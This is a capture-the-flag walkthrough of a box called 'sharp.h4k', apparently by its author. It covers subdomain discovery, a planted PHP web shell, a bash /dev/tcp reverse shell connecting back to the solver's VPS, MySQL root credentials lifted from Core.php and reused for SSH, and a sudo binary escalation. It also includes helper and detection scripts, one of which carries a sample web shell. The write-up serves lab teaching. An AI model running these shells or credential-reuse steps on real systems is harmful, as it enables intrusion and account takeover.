### ENUMERATION

First thing we do is scan the ports:

```
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 01:20 EAT
Nmap scan report for sharp.h4k (23.101.27.202)
Host is up (0.39s latency).
Not shown: 96 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
Nmap done: 1 IP address (1 host up) scanned in 2.26 seconds
```

Got 4 ports open! (96 closed plus 4 open is 100 ports, so this was a top-100 scan; a full `-p-` sweep is still worth kicking off in the background.) Keep in mind that MySQL on 3306 is reachable from the outside; that becomes interesting later.

Opening port 80 in the browser shows nothing but the default Apache2 page:

![](https://i.imgur.com/eu1HNRY.png)

Since I made this challenge I won't bother directory busting here: I know nothing will show up, because there is nothing there at all. So what follows is the intended way to solve my box.

### RECON

The first thing to do is a subdomain scan:

![](https://i.imgur.com/9s1R4Ar.png)

and we get 3 subdomains:

```
admin.sharp.h4k
api.sharp.h4k
pma.sharp.h4k
```

`admin.sharp.h4k` is presumably the admin panel, `api.*` is the API or something like it, and `pma.sharp.h4k` is probably a phpMyAdmin portal. All three live on the same server, so point them at 23.101.27.202 in your `/etc/hosts` file and let's get started!
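The subdomain scan above works because all three names are served from one IP and Apache picks the site from the `Host` header. Here is that technique as an added example, not the tool used in the writeup: send the same request with candidate `Host` values and report the ones whose answer differs from a baseline request for a name that cannot exist. The wordlist, the response sizes and the `sample_fetch` stand-in are constructed; only the hostnames and IP come from the box.

```python
"""Virtual-host discovery by fuzzing the Host header (added example)."""
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Tuple

# A fetcher maps a hostname to (HTTP status, body length).
Fetch = Callable[[str], Tuple[int, int]]


def http_fetch(ip: str, hostname: str, timeout: float = 5.0) -> Tuple[int, int]:
    """GET http://<ip>/ with an explicit Host header (real network fetcher)."""
    req = urllib.request.Request(f"http://{ip}/", headers={"Host": hostname})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:  # 403/404 pages still have a body worth comparing
        return err.code, len(err.read())


def enumerate_vhosts(fetch: Fetch, domain: str, words: Iterable[str]) -> List[str]:
    """Return <word>.<domain> names whose response differs from the baseline.

    The baseline is the answer for a name that cannot exist. The default vhost
    serves the same page for every unknown name, so a different status or size
    means the server has a dedicated vhost for that name.
    """
    baseline = fetch(f"this-name-should-not-exist.{domain}")
    return [
        f"{word}.{domain}"
        for word in words
        if fetch(f"{word}.{domain}") != baseline
    ]


# Constructed sample: plausible answers from the box (sizes are made up).
SAMPLE_RESPONSES = {
    "admin.sharp.h4k": (200, 1820),  # login page
    "api.sharp.h4k": (200, 310),     # "under development" page
    "pma.sharp.h4k": (200, 9100),    # phpMyAdmin login
}
DEFAULT_PAGE = (200, 10701)          # default Apache page for unknown names


def sample_fetch(hostname: str) -> Tuple[int, int]:
    """Offline stand-in for http_fetch using the constructed responses."""
    return SAMPLE_RESPONSES.get(hostname, DEFAULT_PAGE)


if __name__ == "__main__":
    words = ["www", "admin", "api", "pma", "dev", "mail"]
    # Against the real box it would be:
    # enumerate_vhosts(lambda h: http_fetch("23.101.27.202", h), "sharp.h4k", words)
    print(enumerate_vhosts(sample_fetch, "sharp.h4k", words))
```

One caveat: if the catch-all page echoes the requested hostname, the body length shifts by the name length and every candidate "differs"; in that case compare with a small tolerance or strip the hostname from the body before measuring.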
First the admin panel. We get a login page for an admin dashboard:

![](https://i.imgur.com/4LOGIvn.png)

Trying SQLi won't work :) so it would be a waste of time, but realistically that is what someone solving this box would do first: try SQLi and maybe directory busting. I assure you, you'll get nothing at all :) So let's check `api.sharp.h4k`. We get an under-development page, meaning the API is still being built. Developers often leave backup or work-in-progress files on a site even while it's unfinished, so let's try directory busting this subdomain instead:

![](https://i.imgur.com/F7ojuKa.png)

Okay, we have one directory, `/images/`. Let's dive into it:

![](https://i.imgur.com/yNPbE4V.png)

We find a page titled `SECRET API CALLS`. This looks like a backdoor that a hacker left on the very target we were given, so let's type in a command and see what we get:

![](https://i.imgur.com/K0xuWAZ.png)

That is what came back after typing `id`, so we were right: it's a backdoor, a web shell that runs whatever we submit as the web server's user.

### GAINING INITIAL FOOTHOLD

We can get a proper shell by setting up a listener and having the web shell connect back to us, so let's try it. On my terminal I start a listener on port 1337:

![](https://i.imgur.com/FMb2eH1.png)

Then in the input I submit a command that hands us back a reverse shell (replace `yourip` with the listener's address):

```bash
bash -c "bash -i &>/dev/tcp/yourip/1337 <&1"
```

and click `submit`:

![](https://i.imgur.com/BgLPY7P.png)

You didn't expect that to work, did you? It failed because the target is a server on a public IP while we are behind a private (NAT) address, so the connect-back to `yourip` goes nowhere. Either catch the shell on a VPS or expose your local listener publicly. I have a VPS so I'll just use that; if you don't, ngrok can tunnel the port for you (`ngrok tcp 1337` gives you a public host and port that forward to your local listener, and that pair goes into the payload instead of `yourip:1337`).
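The backdoor above executes whatever is submitted, which means that somewhere on disk a PHP file passes request data into a command-execution function. As an added example (not code from the writeup, and the backdoor's real source is not shown on the page), here is the check a defender would run over a web root to find such a file: a scanner for request input reaching `system`/`exec`/`shell_exec`-style calls, either directly, through a backtick operator, or via an intermediate variable. `SAMPLE_FILES` is constructed: a shell in the style the page describes and a trimmed copy of the legitimate `Core.php`.

```python
"""Scan PHP sources for request input flowing into command execution (added example)."""
import re
from typing import Dict, List

EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"

# Direct sink:   system($_POST['cmd'])
DIRECT_RE = re.compile(rf"\b{EXEC_FUNCS}\s*\(\s*[^;]*?{REQUEST_INPUT}", re.S)
# Backtick operator, which is shell_exec in disguise:   `$_GET['c']`
BACKTICK_RE = re.compile(rf"`[^`]*{REQUEST_INPUT}[^`]*`")
# Two-step:   $c = $_POST['cmd']; ... system($c)
ASSIGN_RE = re.compile(rf"(\$\w+)\s*=\s*{REQUEST_INPUT}")
# Common obfuscation wrapper
OBFUSCATED_EVAL_RE = re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\b")


def scan_php(src: str) -> List[str]:
    """Return human-readable findings for one PHP source file (empty list = clean)."""
    hits: List[str] = []
    if DIRECT_RE.search(src):
        hits.append("request input passed straight to an exec function")
    if BACKTICK_RE.search(src):
        hits.append("request input inside backtick shell operator")
    for var in sorted(set(ASSIGN_RE.findall(src))):
        sink = re.compile(rf"\b{EXEC_FUNCS}\s*\(\s*[^;]*?{re.escape(var)}\b", re.S)
        if sink.search(src):
            hits.append(f"request input in {var} reaches an exec function")
    if OBFUSCATED_EVAL_RE.search(src):
        hits.append("obfuscated eval")
    return hits


def scan_tree(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map path -> findings for every file that has at least one finding."""
    report = {path: scan_php(src) for path, src in files.items()}
    return {path: hits for path, hits in report.items() if hits}


# Constructed sample web root (the real backdoor's source is not on the page).
SAMPLE_FILES = {
    "api/images/index.php": """<html><head><title>SECRET API CALLS</title></head><body>
<form method="post"><input name="cmd"><input type="submit" value="submit"></form>
<?php if (isset($_POST['cmd'])) { echo "<pre>" . shell_exec($_POST['cmd']) . "</pre>"; } ?>
</body></html>""",
    "admin/lib/Core.php": """<?php
define("DB_HOST", "localhost");
define("DB_USER", "root");
define("DB_PASSWORD", "superPassw0rd");
session_start();
""",
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_FILES).items():
        print(path, "->", "; ".join(hits))
```

Run it over `/var/www` with the files read from disk instead of `SAMPLE_FILES`; anything it flags under a directory that should only hold images deserves a look, whatever its name is.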
Now that I have a listener running on my VPS, I do the same thing but with the VPS's IP address instead of my local one:

![](https://i.imgur.com/bnAQnHg.png)

And boom, we have SHELL!!!!

Now let's gather some config files and escalate to a user. First, which users exist?

```
www-data@sharp:/var/www/api/images$ cat /etc/passwd | grep /home
cat /etc/passwd | grep /home
xploiter:x:1000:1000::/home/xploiter:/bin/bash
babukrismasi:x:1001:100::/home/babukrismasi:/bin/bash
```

(Each command is echoed back because the shell behind the reverse connection has no pty.) We have 2 users, `xploiter` and `babukrismasi`. Let's hunt for configuration files under the web root:

```
www-data@sharp:/var/www$ ls -al
ls -al
total 24
drwxr-xr-x  6 root root 4096 Dec 24 10:58 .
drwxr-xr-x 12 root root 4096 Dec 20 22:04 ..
drwxr-xr-x  4 root root 4096 Dec 24 10:51 admin
drwxr-xr-x  3 root root 4096 Dec 24 11:26 api
drwxr-xr-x  2 root root 4096 Dec 20 22:04 html
drwxr-xr-x 11 root root 4096 Dec 24 11:02 myadmin
```

Moving into `admin` first, because dashboards like this usually have a configuration file with database credentials:

```
www-data@sharp:/var/www/admin/lib$ ls -la
ls -la
total 32
drwxr-xr-x 2 root root 4096 Dec 24 11:12 .
drwxr-xr-x 4 root root 4096 Dec 24 10:51 ..
-rw-r--r-- 1 root root   13 Jun  8  2018 .htaccess
-rw-r--r-- 1 root root  711 Dec 24 11:12 Core.php
-rw-r--r-- 1 root root 1131 Nov 11 10:18 LIB-database.php
-rw-r--r-- 1 root root   47 Nov 11 00:17 PAGE-bottom.php
-rw-r--r-- 1 root root 1546 Nov 11 11:00 PAGE-top.php
-rw-r--r-- 1 root root  693 Jan 28  2021 SQL-users.sql
```

`Core.php` holds the MySQL connection settings:

```php
www-data@sharp:/var/www/admin/lib$ cat Core.php
cat Core.php
<?php
// (A) ERROR HANDLING - CHANGE TO YOUR OWN
error_reporting(E_ALL & ~E_NOTICE);
ini_set("display_errors", 1);
// ini_set("log_errors", 1);
// ini_set("error_log", "PATH/error.log");

// (B) DATABASE SETTINGS - CHANGE TO YOUR OWN
define("DB_HOST", "localhost");
define("DB_NAME", "panel");
define("DB_CHARSET", "utf8");
define("DB_USER", "root");
define("DB_PASSWORD", "superPassw0rd");

// (C) URL
define("URL_HOST", "http://admin.sharp.h4k/"); // CHANGE TO YOUR OWN
define("URL_PUBLIC", URL_HOST . "public/");

// (D) FILE PATHS
define("PATH_LIB", __DIR__ . DIRECTORY_SEPARATOR);
define("PATH_BASE", dirname(PATH_LIB) . DIRECTORY_SEPARATOR);

// (E) START SESSION
session_start();
```

So we have the MySQL credentials, `root:superPassw0rd`. The panel connects to the database as MySQL root, and since 3306 is open to the world these are also worth trying directly against MySQL. The quicker win, though, is password reuse: let's try the same password against the two local users.

### FOOTHOLD USER

I was able to log in via SSH as `babukrismasi` with the password `superPassw0rd`:

![](https://i.imgur.com/f4MuCI9.png)

And we get the flag from his home folder:

```
babukrismasi@sharp:~$ ls -al
total 24
drwxr-xr-x 2 babukrismasi users 4096 Des 24 12:49 .
drwxr-xr-x 4 root         root  4096 Des 24 11:34 ..
-rw-r--r-- 1 babukrismasi users  220 Mei 15  2017 .bash_logout
-rw-r--r-- 1 babukrismasi users 3526 Mei 15  2017 .bashrc
-rw-r--r-- 1 root         root    24 Des 24 12:49 flag.txt
-rw-r--r-- 1 babukrismasi users  675 Mei 15  2017 .profile
babukrismasi@sharp:~$ cat flag.txt
h4k-it{USERMTATA_KWELI}
```

##### FLAG FOR SHARP - USER : h4k-it{USERMTATA_KWELI}

### PRIVILEGE ESCALATION

With the user flag found, let's escalate our privileges to root. The first thing to check is which binaries we are allowed to run with sudo, using `sudo -l`:

```
babukrismasi@sharp:~$ sudo -l
[sudo] password for babukrismasi:
Matching Defaults entries for babukrismasi on sharp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User babukrismasi may run the following commands on sharp:
    (ALL) /usr/bin/vitayakrismasi
```

`babukrismasi` can run the binary `vitayakrismasi` as any user via `sudo` (it still asks for his own password, which we have). Let's see what the binary does and reverse it if we need to:

![](https://i.imgur.com/XBKkNpW.png)

It needs a username to proceed. Running `strings` on it gives a glimpse of what the username and password might be:

![](https://i.imgur.com/wZrTbGk.png)

Judging by the strings, the username is either `spiderman` or `fazakrismasi`, so let's give it a try:

![](https://i.imgur.com/oDeUyEu.png)

We get prompted for a password:

```
babukrismasi@sharp:~$ sudo vitayakrismasi
SPIDERMAN VERSUS BABU KRISMASI
UTAJUA HUJUI KUDADEKI!
Enter username : fazakrismasi
Welcome Faza Krismasi , Enter your password : adminadmin
IMPOSTER NYAMA WEWE!
```

But we don't know the password. I try `ltrace`, but nothing useful shows up for the password check:

```
babukrismasi@sharp:~$ ltrace vitayakrismasi
puts("SPIDERMAN VERSUS BABU KRISMASI"SPIDERMAN VERSUS BABU KRISMASI
) = 31
puts("UTAJUA HUJUI KUDADEKI! "UTAJUA HUJUI KUDADEKI! 
) = 24
printf("Enter username : ") = 17
gets(0x7ffd421a0ef6, 0x5632251afa6f, 0x7f6569ba5760, 0x5632251afa80Enter username : fazakrismasi
) = 0x7ffd421a0ef6
strcmp("fazakrismasi", "spiderman") = -13
strcmp("fazakrismasi", "fazakrismasi") = 0
printf("Welcome Faza Krismasi , Enter yo"...) = 46
__isoc99_scanf(0x5632251afab3, 0x7ffd421a0ed8, 0x7f6569ba5760, 0x5632251afb4eWelcome Faza Krismasi , Enter your password : admin
) = 0
puts("IMPOSTER NYAMA WEWE!"IMPOSTER NYAMA WEWE!
) = 21
+++ exited (status 0) +++
```

Two things stand out in that trace. The username check is two plain `strcmp` calls against `"spiderman"` and `"fazakrismasi"`, which is exactly why `strings` gave them away. The password check, on the other hand, leaves no library call at all between `scanf` and the `IMPOSTER` message, and `scanf` returned 0 for the input `admin`, which is what a `%d` conversion does with non-numeric input. So the password is most likely read as a number and compared inline, and `ltrace` simply can't see it. (Also worth noting: the username is read with `gets()`, which has no length limit, a classic bug in a binary that runs as root; we don't need it here, though.)

So there are basically two ways to get the password now: guess it, or pull the binary down to my own machine and dig into it. I'll go with the second one, lol! First, `/tmp`:

```
babukrismasi@sharp:/tmp$ ls -l
total 60
-rw-r--r-- 1 xploiter     xploiter 35560 Apr 29  2019 mysql-apt-config_0.8.13-1_all.deb
drwx------ 3 root         root      4096 Des 24 13:10 systemd-private-773be1f6958c44f29cfec16a7f1b4984-apache2.service-b1WVzE
drwx------ 3 root         root      4096 Des 23 14:14 systemd-private-773be1f6958c44f29cfec16a7f1b4984-systemd-timesyncd.service-h1j06s
-rw-r--r-- 1 babukrismasi users        9 Des 25 15:16 tobedeleted.txt
-rwxr-xr-x 1 xploiter     xploiter  8912 Des 25 15:13 vitayakrismasi
```

A copy of the binary is sitting right there, alongside a file named `tobedeleted.txt`. Let's read it:

```
babukrismasi@sharp:/tmp$ cat tobedeleted.txt
25122021
```

The digits spell out the Christmas date (25/12/2021); that's probably the password. Let's test it on the `/tmp` copy of the binary (unprivileged, so the final `cat` of the root flag fails, but the check itself passes):

```
babukrismasi@sharp:/tmp$ ./vitayakrismasi
SPIDERMAN VERSUS BABU KRISMASI
UTAJUA HUJUI KUDADEKI!
Enter username : fazakrismasi
Welcome Faza Krismasi , Enter your password : 25122021
Why are you mad na?, RELAX BIG MAN , Spiderman ran away!
cat: /root/flag.txt: Permission denied
```

And it worked perfectly!
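Before moving on to the sudo run, here is the reading of that `ltrace` output turned into code, as an added example (not tooling from the writeup). `LTRACE_LOG` is the trace shown above with the program's own output interleaved, exactly as `ltrace` prints it. The idea: every `strcmp` operand that is not something we typed is a hard-coded secret, any call from a known unbounded-input family is worth flagging, and a check that leaves no traced call between the input function and the verdict is not going through libc at all.

```python
"""Mine an ltrace log for hard-coded compare values and risky input calls (added example)."""
import re
from typing import Dict, List, Set

LTRACE_LOG = '''puts("SPIDERMAN VERSUS BABU KRISMASI"SPIDERMAN VERSUS BABU KRISMASI
) = 31
puts("UTAJUA HUJUI KUDADEKI! "UTAJUA HUJUI KUDADEKI! 
) = 24
printf("Enter username : ") = 17
gets(0x7ffd421a0ef6, 0x5632251afa6f, 0x7f6569ba5760, 0x5632251afa80Enter username : fazakrismasi
) = 0x7ffd421a0ef6
strcmp("fazakrismasi", "spiderman") = -13
strcmp("fazakrismasi", "fazakrismasi") = 0
printf("Welcome Faza Krismasi , Enter yo"...) = 46
__isoc99_scanf(0x5632251afab3, 0x7ffd421a0ed8, 0x7f6569ba5760, 0x5632251afb4eWelcome Faza Krismasi , Enter your password : admin
) = 0
puts("IMPOSTER NYAMA WEWE!"IMPOSTER NYAMA WEWE!
) = 21
+++ exited (status 0) +++
'''

# A traced call starts a line with the function name; ') = 24' continuation lines do not.
CALL_RE = re.compile(r"^([A-Za-z_]\w*)\(", re.M)
# strcmp/strncmp/strcasecmp with two string-literal operands.
CMP_RE = re.compile(r'\b(str(?:n|case)?cmp)\("([^"]*)",\s*"([^"]*)"')

UNSAFE_CALLS: Dict[str, str] = {
    "gets": "reads an unbounded line into a fixed buffer",
    "strcpy": "unbounded copy",
    "strcat": "unbounded append",
    "sprintf": "unbounded format into a buffer",
}


def traced_calls(log: str) -> List[str]:
    """Library functions in call order."""
    return CALL_RE.findall(log)


def hardcoded_compare_values(log: str, typed: Set[str]) -> Set[str]:
    """Literal strcmp operands that are not our own input: the embedded secrets."""
    found: Set[str] = set()
    for _, left, right in CMP_RE.findall(log):
        if left in typed:
            found.add(right)
        elif right in typed:
            found.add(left)
        else:  # neither side is ours; both deserve a look
            found.update((left, right))
    return found


def unsafe_calls(log: str) -> List[str]:
    """Calls from the unbounded-input family that appeared in the trace."""
    return sorted({fn for fn in traced_calls(log) if fn in UNSAFE_CALLS})


def calls_between(log: str, start: str, end: str) -> List[str]:
    """Traced calls strictly between the first `start` and the next `end`.

    An empty list between the input call and the verdict message means the
    comparison happened inline (or in an inlined routine) and ltrace cannot
    show it; time to guess or to open the binary in a disassembler.
    """
    calls = traced_calls(log)
    if start not in calls:
        return []
    rest = calls[calls.index(start) + 1:]
    return rest[:rest.index(end)] if end in rest else rest


if __name__ == "__main__":
    print("hard-coded:", hardcoded_compare_values(LTRACE_LOG, {"fazakrismasi"}))
    print("unsafe:", [f"{fn}: {UNSAFE_CALLS[fn]}" for fn in unsafe_calls(LTRACE_LOG)])
    print("between scanf and verdict:", calls_between(LTRACE_LOG, "__isoc99_scanf", "puts"))
```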
So now let's do it with sudo:

```
babukrismasi@sharp:~$ sudo vitayakrismasi
[sudo] password for babukrismasi:
SPIDERMAN VERSUS BABU KRISMASI
UTAJUA HUJUI KUDADEKI!
Enter username : fazakrismasi
Welcome Faza Krismasi , Enter your password : 25122021
Why are you mad na?, RELAX BIG MAN , Spiderman ran away!
h4k-it{uschezenakrismasi_sio_poa}
```

And we have the ROOT FLAG!!! `h4k-it{uschezenakrismasi_sio_poa}`

---

25 | 12 | 2021 | @tahaafarooq (twitter)